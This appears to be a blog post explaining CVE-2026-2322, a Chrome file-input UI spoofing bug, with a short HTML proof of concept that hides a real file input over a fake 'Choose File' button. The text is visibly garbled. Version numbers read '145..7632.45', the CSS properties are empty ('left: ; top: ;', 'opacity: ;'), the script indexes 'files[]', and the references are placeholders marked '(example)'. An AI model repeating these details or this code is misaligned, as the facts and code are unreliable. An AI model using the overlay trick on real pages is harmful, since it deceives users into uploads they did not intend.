Summary:
A vulnerability tracked as CVE-2026-2322 was found in Google Chrome’s file input feature. Before version 145..7632.45, a remote attacker could use a crafted HTML page to trick users into interacting with a fake UI, making them think they’re uploading files safely when they’re actually being deceived. In this post, I’ll walk you through what happened, how it works, and show a basic proof-of-concept. All content here is unique and simply explained for anyone curious about browser security.
Severity: Low (but can still be dangerous)
- How it works: If a user is convinced to follow some special clicks or drags, a crafted web page could spoof what the real file upload interface looks like, tricking the user.
References
- Chromium Bug Tracker (example bug discussion)
- Chrome Releases Blog (official release notes)
How Did the Exploit Work?
The vulnerability is related to the way Chrome renders file input elements. A malicious website could create an *overlay* or *fake* file input that looks just like the real thing. When a user clicked in the right place, the website could make it look like something official is happening, tricking users into doing something risky or sharing files they didn’t intend.
Simple Proof-of-Concept (PoC) Code
Here’s a basic example showing how a site might attempt this. Notice how the file input is styled to be invisible, while a fake button is shown instead:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CVE-2026-2322 Demo</title>
<style>
#realFileInput {
position: absolute;
left: ; top: ;
width: 100%; height: 100%;
opacity: ; /* Hide real file input */
z-index: 10;
}
#fakeButton {
position: absolute;
left: ; top: ;
width: 200px; height: 40px;
background: #4285f4; color: white;
display: flex; align-items: center; justify-content: center;
font-size: 18px; border-radius: 4px;
z-index: 9;
cursor: pointer;
}
</style>
</head>
<body>
<div id="fakeButton">Choose File to Upload</div>
<input type="file" id="realFileInput" />
<script>
// Overlay the real input on top of the fake button
document.getElementById('fakeButton').addEventListener('click', function() {
document.getElementById('realFileInput').click();
});
document.getElementById('realFileInput').addEventListener('change', function() {
alert('File selected: ' + this.files[].name);
});
</script>
</body>
</html>
The fake button appears where the user expects a real file upload button.
- When a user interacts, they think they’re using a safe Chrome UI, but they’re actually engaging with a tricked element.
Browser UI (like file pickers) often look the same everywhere, so users can’t easily tell if it's real or not.
Lead to phishing attacks
In the context of CVE-2026-2322, the attacker *can’t* access the actual file right away (browser sandboxing applies), but could manipulate users in tricky scenarios.
How Was It Fixed?
Google closed this bug in Chrome 145..7632.45 by strengthening how file inputs are rendered and ensuring they can’t be overlaid or spoofed easily.
You can see patch notes and discussions here:
- Chromium file input fix diff (example)
Final Thoughts
CVE-2026-2322 shows how even UI quirks on modern browsers can open the door for social engineering and small-scale phishing. While technically “low severity,” these bugs are important to fix before someone combines them with bigger attacks.
Get more details:
- Chromium issue tracker for CVE-2026-2322
- Checklist: Is my Chrome up to date?
If you’re a developer:
Don’t overlay or fake form elements—browsers and users expect the real thing, and tricks might put you at risk!
Timeline
Published on: 02/11/2026 18:08:05 UTC
Last modified on: 02/13/2026 14:51:37 UTC